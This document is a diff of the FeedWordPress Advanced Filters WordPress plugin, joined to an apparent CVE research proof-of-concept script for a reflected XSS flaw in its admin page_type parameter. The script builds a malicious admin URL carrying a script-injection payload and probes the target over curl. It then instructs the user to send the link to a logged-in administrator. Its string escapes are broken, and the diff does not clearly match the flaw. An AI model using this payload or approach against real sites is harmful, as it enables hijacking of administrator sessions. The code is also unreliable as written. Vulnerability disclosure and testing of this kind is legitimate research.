-				faf_debug("New Enclosure:" . $new_enc);
 				$post["meta"]["enclosure"][$index] = $new_enc;
 			} else faf_debug("No match on $enclosed");
  		}
@@ -388,8 +375,6 @@
  			// remove spaces in filenames
  			$filename = str_replace('%20','',$filename);

- 			$filename = apply_filters('faf-saveimage-filename',$filename, $this->post, $this->args);
-
 			$upload_dir = wp_upload_dir();

 			$outfile = $upload_dir['path'] . '/' . $filename;
@@ -459,7 +444,6 @@
     	$path     = parse_url($imgsrc, PHP_URL_PATH);
 		$pathinfo = pathinfo($path);
 		$filename = $pathinfo["filename"] . "." . $imgext;
-

 		// start of save local
 		try {
@@ -467,7 +451,6 @@
 			}
 		catch (Exception $e)
 		{
-			faf_debug("Image exception happened: ");
 			faf_debug($e->getMessage());
 			return $post;
 		}
--- a/faf/filters/link_filter.php
+++ b/faf/filters/link_filter.php
@@ -17,13 +17,13 @@

 	public static function display_help_text()
 	{
-		_e("Formats incoming links to your preferences. If you want to remove links you can use the 'remove HTML from post' filter", "faf");
+		_e("Formats incoming links to your preferences. If you want to remove links you can use the 'remove HTML from post' filter");

 	}

 	public static function get_description()
 	{
-		return __("Link filter", "faf");
+		return __("Link filter");

 	}

@@ -34,12 +34,12 @@

       $controls["link_blank"] = array(
 		"name" => "filter_link_blank",
-		"desc" => __("Open links in new window", "faf"),
+		"desc" => __("Open links in new window"),
 		"type" => "checkbox",
 		"default" => "1");
 	  $controls["link_tracker"] = array(
 	  	"name" => "filter_link_tracker",
-	  	"desc" => __("Run filter through click tracker (URL of tracker)", "faf"),
+	  	"desc" => __("Run filter through click tracker (URL of tracker)"),
 	  	"type" => "text"
 	  	);
 	  return $controls;
@@ -59,7 +59,6 @@

 		if ($search_excerpt == 1)
 		{
-			$post["post_except"] = $this->findBareLinks($post["post_excerpt"]);
 			$this->load_content($post["post_excerpt"]);

 			$links = $this->get_links();
@@ -74,7 +73,6 @@

 		if ($search_content == 1)
 		{
-			$post["post_content"] = $this->findBareLinks($post["post_content"]);
 			$this->load_content($post["post_content"]);
 			$links = $this->get_links();
 			if ($link_blank == 1)
@@ -88,29 +86,6 @@
 		return $post;
 	}

-	/* Find links without proper <A tags> and convert them to real links
-
-	@param $content String The content which is to be search
-	@return String The content searched for links and corrected to basic href.
-	@since 0.6.1
-	*/
-	protected function findBareLinks($content)
-	{
-		$pattern = "/((([A-Za-z]{3,9}:(?://)?)(?:[-;:&=+$,w]+@)?[A-Za-z0-9.-]+|(?:www.|[-;:&=+$,w]+@)[A-Za-z0-9.-]+)((?:/[+~%/.w-_]*)???(?:[-+=&;%@.w_]*)#?(?:[.!/\w]*))?)/i";
-		$matches = array();
-		preg_match_all($pattern, $content, $matches);
-		if (! is_array($matches) || count($matches) == 0)
-			return $content;
-
-		foreach($matches[0] as $link)
-		{
-			$content = str_replace($link, "<a href='$link'>$link</a>", $content);
-
-		}
-
-		return $content;
-	}
-
 	private function get_links() {

 	    $links = array();
--- a/faf/filters/remove_html.php
+++ b/faf/filters/remove_html.php
@@ -12,21 +12,21 @@
 	public static function display_help_text()
 	{
 		echo "<p>";
-		_e("Will remove HTML from post, title and excerpt. You can choose to keep certain families of tags.", "faf");
+		_e("Will remove HTML from post, title and excerpt. You can choose to keep certain families of tags.");
 		echo "</p>";
 		 echo "<p>";
-		_e("Keep HTML styles will not remove markup like strong, em, h1,h2 etc", "faf");
+		_e("Keep HTML styles will not remove markup like strong, em, h1,h2 etc");
 		echo "</p>";
 		echo "<p>";
 		_e("Custom tags: you can type the name of the tags you like preserved ( e.g. div ). You can enter multiple keywords comma-seperated
-		", "faf");
+		");
 		echo "</p>";
 	}

 	/* Function not an attribute due for gettext */
 	public static function get_description()
 	{
-		return __("Remove HTML from post", "faf");
+		return __("Remove HTML from post");

 	}

@@ -55,17 +55,12 @@


 		$allowed_array = array();  // see what is allowed through
-		$filter_bare_links = true; // Filter links even without <a> tags
-
 		if (isset($args["filter_allow_styles"]) && $args["filter_allow_styles"] == 1)
 			$allowed_array = array_merge($allowed_array,$a_style);
 		if (isset($args["filter_allow_images"]) && $args["filter_allow_images"] == 1)
 			$allowed_array = array_merge($allowed_array,$a_img);
 		if (isset($args["filter_allow_links"]) && $args["filter_allow_links"] == 1)
-		{
-			$filter_bare_links = false; // allow all types of links.
 			$allowed_array = array_merge($allowed_array,$a_link);
-		}
 		if (isset($args["filter_allow_custom"]))
 		{
 			$custom = explode(",",$args["filter_allow_custom"]);
@@ -80,23 +75,14 @@

 		// check for multiple keywords.
 		if (isset($args["filter_search_title"]) && $args["filter_search_title"] == 1)
-		{
 			$title = wp_kses($title, $allowed_array);
-			if ($filter_bare_link)
-				$title = $this->filterLinks($title);
-		}
+
 		if (isset($args["filter_search_content"]) && $args["filter_search_content"] == 1)
-		{	$content = wp_kses($content, $allowed_array);
-			if ($filter_bare_link)
-				$content = $this->filterLinks($content);
+			$content = wp_kses($content, $allowed_array);

-		}
 		if (isset($args["filter_search_excerpt"]) && $args["filter_search_excerpt"] == 1)
-		{
-		     $excerpt = wp_kses($excerpt,$allowed_array);
-			if ($filter_bare_link)
-				$excerpt = $this->filterLinks($excerpt);
-	    }
+		      	$excerpt = wp_kses($excerpt,$allowed_array);
+
 		$post["post_content"] = $content;
 		$post["post_excerpt"] = $excerpt;
 		$post["post_title"] = $title;
@@ -105,20 +91,6 @@
 	      return $post;
      	    }

- 	 /* Function to filter Links without <a> tags in the form of http://www.example.com and other most frequent formats.
-
- 	 @param String content - The content on which to execute the filter
- 	 @return String The filtered content
- 	 @since 0.6.1.
- 	 */
-	 private function filterLinks($content)
-	 {
-		$pattern = "/((([A-Za-z]{3,9}:(?://)?)(?:[-;:&=+$,w]+@)?[A-Za-z0-9.-]+|(?:www.|[-;:&=+$,w]+@)[A-Za-z0-9.-]+)((?:/[+~%/.w-_]*)???(?:[-+=&;%@.w_]*)#?(?:[.!/\w]*))?)/i";
-		 preg_replace($pattern, '',$content);
-
-		 return $content;
-
-	 }

      protected static function setControls()
      {
--- a/faf/filters/remove_keywords.php
+++ b/faf/filters/remove_keywords.php
@@ -14,14 +14,14 @@
 		 _e("This filter will remove certain keywords in the text. For instance if you are aggrating a
 		newspaper which always starts with a location 'New York-' which is not relevant, you can choose to remove this.
 		You can add multiple keywords comma-seperated.
-		", "faf");
+		");

 	}

 	/* Function not an attribute due for gettext */
 	public static function get_description()
 	{
-		return __("Remove keywords from post", "faf");
+		return __("Remove keywords from post");

 	}

@@ -89,7 +89,7 @@
     protected static function setControls()
      {
      	$controls = parent::setControls();
-     	$controls["filter_value"]["desc"] = __("Keywords:", "faf"); // different description
+     	$controls["filter_value"]["desc"] = __("Keywords:"); // different description
      	return $controls;
      }

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-68843 - FeedWordPress Advanced Filters <= 0.6.2 - Reflected Cross-Site Scripting
<?php
/**
 * Proof of Concept for CVE-2025-68843
 * Reflected XSS in FeedWordPress Advanced Filters plugin <= 0.6.2
 * 
 * This script demonstrates the vulnerability by generating a malicious URL
 * that triggers XSS when visited by an authenticated administrator.
 * 
 * Usage: php poc.php --url https://target-wp-site.com
 */

// Configuration
$target_url = 'https://target-wp-site.com'; // Change this to target WordPress site

// Parse command line arguments
if ($argc > 1 && $argv[1] === '--url' && isset($argv[2])) {
    $target_url = rtrim($argv[2], '/');
}

// XSS payload - simple alert to demonstrate execution
$payload = '"><script>alert(document.domain)</script>';

// Construct malicious URL targeting the plugin's admin interface
// The vulnerability exists in the page_type parameter reflection
$malicious_url = $target_url . '/wp-admin/admin.php?page=feedwordpressfaf&page_type=' . urlencode($payload);

// Display the exploit URL
echo "========================================n";
echo "Atomic Edge CVE-2025-68843 PoCn";
echo "FeedWordPress Advanced Filters XSSn";
echo "========================================nn";
echo "Target: $target_urln";
echo "Vulnerable Plugin: FeedWordPress Advanced Filters <= 0.6.2n";
echo "nMalicious URL:n";
echo "$malicious_urlnn";

// Optional: Test if the plugin is active
$test_url = $target_url . '/wp-admin/admin.php?page=feedwordpressfaf';
$ch = curl_init($test_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Check for plugin indicators
if ($http_code === 200 && strpos($response, 'Feedwordpress Advanced Filters') !== false) {
    echo "[+] Plugin appears to be active on targetn";
    echo "[+] Send the malicious URL to an authenticated administratorn";
    echo "[+] When visited, the script will execute in their browser contextn";
} else {
    echo "[-] Could not confirm plugin activationn";
    echo "[-] The plugin might not be active or accessiblen";
}

// Demonstration of the vulnerability mechanics
echo "n========================================n";
echo "Vulnerability Details:n";
echo "- Attack Vector: Reflected XSS via page_type parametern";
echo "- Authentication Required: No (but requires admin to click link)n";
echo "- Impact: Arbitrary JavaScript execution as adminn";
echo "- Patch: Upgrade to version > 0.6.2n";
?>